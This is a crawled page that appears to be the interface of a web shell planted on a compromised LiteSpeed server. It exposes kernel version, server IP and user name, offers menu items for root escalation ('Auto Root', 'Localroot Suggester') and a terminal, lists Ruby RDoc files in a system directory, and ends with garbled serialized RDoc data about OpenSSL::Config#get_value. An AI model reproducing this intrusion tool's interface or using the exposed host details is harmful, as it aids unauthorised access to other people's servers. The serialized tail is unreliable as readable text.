Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.37
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby33 /
share /
ri /
system /
OpenSSL /
Config /
Delete
Unzip
Name
Size
Permission
Date
Action
%5b%5d-i.ri
835
B
-rw-r--r--
2026-04-07 17:22
cdesc-Config.ri
1.22
KB
-rw-r--r--
2026-04-07 17:22
each-i.ri
528
B
-rw-r--r--
2026-04-07 17:22
get_value-i.ri
884
B
-rw-r--r--
2026-04-07 17:22
initialize_copy-i.ri
268
B
-rw-r--r--
2026-04-07 17:22
inspect-i.ri
420
B
-rw-r--r--
2026-04-07 17:22
new-c.ri
751
B
-rw-r--r--
2026-04-07 17:22
parse-c.ri
407
B
-rw-r--r--
2026-04-07 17:22
parse_config-c.ri
431
B
-rw-r--r--
2026-04-07 17:22
sections-i.ri
390
B
-rw-r--r--
2026-04-07 17:22
to_s-i.ri
1.12
KB
-rw-r--r--
2026-04-07 17:22
Save
Rename
U:RDoc::AnyMethod[iI"get_value:ETI"OpenSSL::Config#get_value;TF:privateo:RDoc::Markup::Document:@parts[ o:RDoc::Markup::Paragraph; [I"6Gets the value of _key_ from the given _section_.;To:RDoc::Markup::BlankLine o; ; [I"9Given the following configurating file being loaded:;T@o:RDoc::Markup::Verbatim; [ I".config = OpenSSL::Config.load('foo.cnf') ;TI"3 #=> #<OpenSSL::Config sections=["default"]> ;TI"puts config.to_s ;TI" #=> [ default ] ;TI" # foo=bar ;T:@format0o; ; [I"LYou can get a specific value from the config if you know the _section_ ;TI"and _key_ like so:;T@o;; [I"'config.get_value('default','foo') ;TI" #=> "bar";T; 0: @fileI"ext/openssl/ossl_config.c;T:0@omit_headings_from_table_of_contents_below0I".config.get_value(section, key) -> string ;T0[ I" (p1, p2);T@!FI"Config;TcRDoc::NormalClass00